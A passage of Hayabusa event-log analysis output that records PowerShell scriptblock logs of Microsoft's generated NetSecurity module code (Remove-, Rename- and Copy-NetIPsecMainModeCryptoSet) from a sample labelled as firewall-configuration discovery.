$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.Paramete",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardc",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"imv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 